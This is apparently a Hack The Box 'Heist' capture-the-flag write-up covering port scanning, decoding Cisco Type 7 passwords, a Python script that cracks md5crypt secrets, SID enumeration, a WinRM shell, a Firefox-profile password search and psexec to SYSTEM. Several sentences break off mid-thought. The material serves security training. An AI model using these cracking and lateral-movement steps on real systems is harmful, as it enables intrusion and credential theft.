Heist is an easy Windows box in the Hack The Box CTF series.
As usual I added 10.10.10.149 to /etc/hosts as heist.htb.
I started with an nmap port scan (default scripts, version detection, top 1000 ports): nmap -v -sV -sC -oN nmap.scan heist.htb
The nmap result was as below:
➜ heist nmap -v -sV -sC -oN nmap.scan 10.10.10.149
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-10 13:15 +03
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 13:15
Completed NSE at 13:15, 0.00s elapsed
Initiating NSE at 13:15
Completed NSE at 13:15, 0.00s elapsed
Initiating NSE at 13:15
Completed NSE at 13:15, 0.00s elapsed
Initiating Ping Scan at 13:15
Scanning 10.10.10.149 [4 ports]
Completed Ping Scan at 13:15, 0.39s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 13:15
Completed Parallel DNS resolution of 1 host. at 13:15, 0.05s elapsed
Initiating SYN Stealth Scan at 13:15
Scanning 10.10.10.149 [1000 ports]
Discovered open port 135/tcp on 10.10.10.149
Discovered open port 445/tcp on 10.10.10.149
Discovered open port 80/tcp on 10.10.10.149
Completed SYN Stealth Scan at 13:15, 24.33s elapsed (1000 total ports)
Initiating Service scan at 13:15
Scanning 3 services on 10.10.10.149
Completed Service scan at 13:16, 20.01s elapsed (3 services on 1 host)
NSE: Script scanning 10.10.10.149.
Initiating NSE at 13:16
Completed NSE at 13:16, 40.08s elapsed
Initiating NSE at 13:16
Completed NSE at 13:16, 1.06s elapsed
Initiating NSE at 13:16
Completed NSE at 13:16, 0.00s elapsed
Nmap scan report for 10.10.10.149
Host is up (0.27s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE       VERSION
80/tcp  open  http          Microsoft IIS httpd 10.0
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Support Login Page
|_Requested resource was login.php
135/tcp open  msrpc         Microsoft Windows RPC
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 3s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2019-11-10T10:16:11
|_  start_date: N/A

NSE: Script Post-scanning.
Initiating NSE at 13:16
Completed NSE at 13:16, 0.00s elapsed
Initiating NSE at 13:16
Completed NSE at 13:16, 0.00s elapsed
Initiating NSE at 13:16
Completed NSE at 13:16, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 87.62 seconds
           Raw packets sent: 2014 (88.592KB) | Rcvd: 17 (732B)
Nmap revealed three open ports; SMB (445) and IIS (80) are the interesting ones. The host only negotiates SMB 2.02 (signing enabled but not required), so without credentials there is nothing to do on SMB yet, and I moved on to enumerate the web server.
The default page on IIS is a support login page (login.php) for reporting issues. There is an option to login as
The attachment is a plain text file containing the running configuration of a Cisco IOS device, including an enable secret and the "encrypted" passwords of two local users, admin and rout3r.
version 12.2
no service pad
service password-encryption
!
isdn switch-type basic-5ess
!
hostname ios-1
!
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
!
!
ip ssh authentication-retries 5
ip ssh version 2
!
!
router bgp 100
 synchronization
 bgp log-neighbor-changes
 bgp dampening
 network 192.168.0.0 mask 300.255.255.0
 timers bgp 3 9
 redistribute connected
!
ip classless
ip route 0.0.0.0 0.0.0.0 192.168.0.1
!
!
access-list 101 permit ip any any
dialer-list 1 protocol ip list 101
!
no ip http server
no ip http secure-server
!
line vty 0 4
 session-timeout 600
 authorization exec SSH
 transport input ssh
Cisco Type 7 passwords are not really encrypted: the string is a reversible XOR obfuscation against a fixed, publicly known key, so any Type 7 decoder recovers the plaintext instantly. I used an online Cisco Type 7 decoder on the two username lines from the attachment. The enable secret is a different matter: Type 5 is a salted MD5 hash (md5crypt), which cannot be reversed and has to be cracked with a wordlist, so I had to use
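The two steps above, decoding the Type 7 strings and cracking the Type 5 secret, as an added example that is not part of the original post. The XOR key and the md5crypt algorithm are the public ones (the same thing the online decoder and any cracker implement); the config excerpt is copied from the attachment shown above, and the tiny wordlist is constructed for the example so it runs offline.

```python
"""
Cisco IOS credential recovery (added example, not from the original post).

Two kinds of credential appear in the attachment's config:
  * "password 7 ..." - Type 7: reversible obfuscation (XOR against a fixed,
                       publicly known key). It is decoded, not cracked.
  * "secret 5 ..."   - Type 5: salted md5crypt ($1$) hash, one-way. The only
                       option is a dictionary or brute-force attack.
"""
import hashlib
import re
from typing import Iterable, Optional

# Public XOR key used by Cisco's Type 7 obfuscation.
_XLAT = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"


def decode_type7(encoded: str) -> str:
    """Type 7: two decimal digits give the key offset, the rest is hex bytes
    XORed with the key starting at that offset."""
    seed = int(encoded[:2])
    data = bytes.fromhex(encoded[2:])
    return "".join(chr(b ^ _XLAT[(seed + i) % len(_XLAT)]) for i, b in enumerate(data))


_ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(v: int, n: int) -> str:
    out = ""
    for _ in range(n):
        out += _ITOA64[v & 0x3F]
        v >>= 6
    return out


def md5crypt(password: bytes, salt: bytes) -> str:
    """FreeBSD md5crypt ($1$), which is what Cisco 'enable secret 5' stores."""
    magic = b"$1$"
    salt = salt[:8]
    ctx = hashlib.md5(password + magic + salt)
    alt = hashlib.md5(password + salt + password).digest()
    pl = len(password)
    while pl > 0:
        ctx.update(alt[:min(16, pl)])
        pl -= 16
    i = len(password)
    while i:
        ctx.update(b"\0" if i & 1 else password[:1])
        i >>= 1
    final = ctx.digest()
    for i in range(1000):  # stretching loop: the reason cracking is slow
        c = hashlib.md5()
        c.update(password if i & 1 else final)
        if i % 3:
            c.update(salt)
        if i % 7:
            c.update(password)
        c.update(final if i & 1 else password)
        final = c.digest()
    out = ""
    for a, b, k in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)):
        out += _to64((final[a] << 16) | (final[b] << 8) | final[k], 4)
    out += _to64(final[11], 2)
    return (magic + salt + b"$").decode() + out


def crack_type5(hash_str: str, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack on a '$1$salt$hash' secret; returns the word or None."""
    _, _, salt, _ = hash_str.split("$")
    for word in wordlist:
        if md5crypt(word.encode(), salt.encode()) == hash_str:
            return word
    return None


def recover_credentials(config: str, wordlist: Iterable[str]) -> dict:
    """Pull every Type 7 user password and the Type 5 enable secret out of a config."""
    found = {}
    for m in re.finditer(r"^username (\S+) .*password 7 (\S+)", config, re.M):
        found[m.group(1)] = decode_type7(m.group(2))
    for m in re.finditer(r"^enable secret 5 (\S+)", config, re.M):
        found["enable"] = crack_type5(m.group(1), wordlist)
    return found


# Credential lines copied from the attachment in the post.
CONFIG = """\
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
"""

# Constructed wordlist for the example; a real run would feed rockyou.txt or similar.
WORDLIST = ["password", "cisco123", "supportdesk", "stealth1agent", "admin"]

if __name__ == "__main__":
    for name, secret in recover_credentials(CONFIG, WORDLIST).items():
        print(f"{name}: {secret}")
```

The asymmetry is the point: the Type 7 decode costs one XOR per byte with no secret input, while each Type 5 guess costs 1002 MD5 computations and still only succeeds if the word is in the list, which is why a wordlist cracker (hashcat mode 500 or john) is the practical tool for the enable secret.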
With all three passwords recovered, the question was where to use them. The usernames "rout3r" and "admin" from the config did not work, but the "issues" page mentioned a user called "hazard", so I tried "hazard" with the cracked enable secret against SMB. The login succeeded, but the listing shows only the default administrative shares (ADMIN$, C$, IPC$), none of which hazard can access, so SMB gives nothing further on its own.
➜ heist smbclient -U hazard%stealth1agent -L 10.10.10.149

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.149 failed (Error NT_STATUS_IO_TIMEOUT)
Failed to connect with SMB1 -- no workgroup available
I needed more usernames on the box, and Impacket is the tool for that. Its lookupsid.py script (https://github.com/SecureAuthCorp/impacket/blob/master/examples/lookupsid.py) brute-forces RIDs over the LSARPC named pipe and resolves each SID to a name, so any valid credentials, even an unprivileged local user like hazard, are enough to enumerate the local accounts and groups.
The script listed a number of SUPPORTDESK users:
➜ heist python lookupsid.py hazard:stealth1agent@heist.htb
Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation

[*] Brute forcing SIDs at heist.htb
[*] StringBinding ncacn_np:heist.htb[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112
500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)
Since I could not enumerate any further over SMB, I turned to WinRM. Evil-WinRM is not an exploit but a WinRM shell client: if one of the enumerated users is allowed remote management and I know their password, it gives me a PowerShell session. WinRM listens on 5985/tcp (HTTP) by default, which is outside nmap's default top 1000 ports and so was missing from the first scan, so I checked it explicitly.
➜ evil-winrm git:(master) nmap -p 5985 heist.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-10 14:41 +03
Nmap scan report for heist.htb (10.10.10.149)
Host is up (0.15s latency).

PORT     STATE SERVICE
5985/tcp open  wsman

Nmap done: 1 IP address (1 host up) scanned in 0.56 seconds
The port is open, so the next step was to try the enumerated users against the passwords recovered from the Cisco IOS configuration.
After a couple of attempts, the user Chase with the decoded admin password (Q4)sJu\Y8qz*A3?d) gave a user shell on Heist.
➜ evil-winrm git:(master) ruby evil-winrm.rb -u 'Chase' -p 'Q4)sJu\Y8qz*A3?d' -i heist.htb

Evil-WinRM shell v1.8

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Chase\Documents>
From there I read user.txt:
➜ evil-winrm git:(master) ruby evil-winrm.rb -u 'Chase' -p 'Q4)sJu\Y8qz*A3?d' -i heist.htb

Evil-WinRM shell v1.8

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Chase\Documents> cd ..
*Evil-WinRM* PS C:\Users\Chase> cd Desktop
*Evil-WinRM* PS C:\Users\Chase\Desktop> dir

    Directory: C:\Users\Chase\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        4/22/2019   9:08 AM            121 todo.txt
-a----        4/22/2019   9:07 AM             32 user.txt

*Evil-WinRM* PS C:\Users\Chase\Desktop> type user.txt
a127dae[---------]95f59c4
*Evil-WinRM* PS C:\Users\Chase\Desktop>
There are a couple of ways to privesc on this box; I went with the intended one, recovering the password stored in Chase's Firefox user profile.
So first I changed directory to C:\Users\Chase\AppData\Roaming\Mozilla\Firefox\Profiles\77nc64t5.default\sessionstore-backups
and searched for credential strings with this PowerShell command (it walks the whole user profile under $Env:USERPROFILE, regardless of the current directory):
Get-ChildItem -Path $Env:USERPROFILE -Recurse -File | Select-String password
After a few false hits, I had the Administrator password:
Next I used Impacket's psexec.py with that password. It uploads a service binary to the writable ADMIN$ share and starts it as a service, which is noisy but lands a SYSTEM shell, and from there I read root.txt.
➜ heist python psexec.py Administrator@heist.htb
Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation

Password:
[*] Requesting shares on heist.htb.....
[*] Found writable share ADMIN$
[*] Uploading file nLvdvvMS.exe
[*] Opening SVCManager on heist.htb.....
[*] Creating service ZqjZ on heist.htb.....
[*] Starting service ZqjZ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.437]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>cd /

C:\>cd Users/Administrator/Desktop

C:\Users\Administrator\Desktop>ls
'ls' is not recognized as an internal or external command,
operable program or batch file.

C:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 78E3-E62D

 Directory of C:\Users\Administrator\Desktop

04/22/2019  09:05 AM    <DIR>          .
04/22/2019  09:05 AM    <DIR>          ..
04/22/2019  09:05 AM                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)   7,839,940,608 bytes free

C:\Users\Administrator\Desktop>type root.txt
50dfa3[-----------------]3d766897

C:\Users\Administrator\Desktop>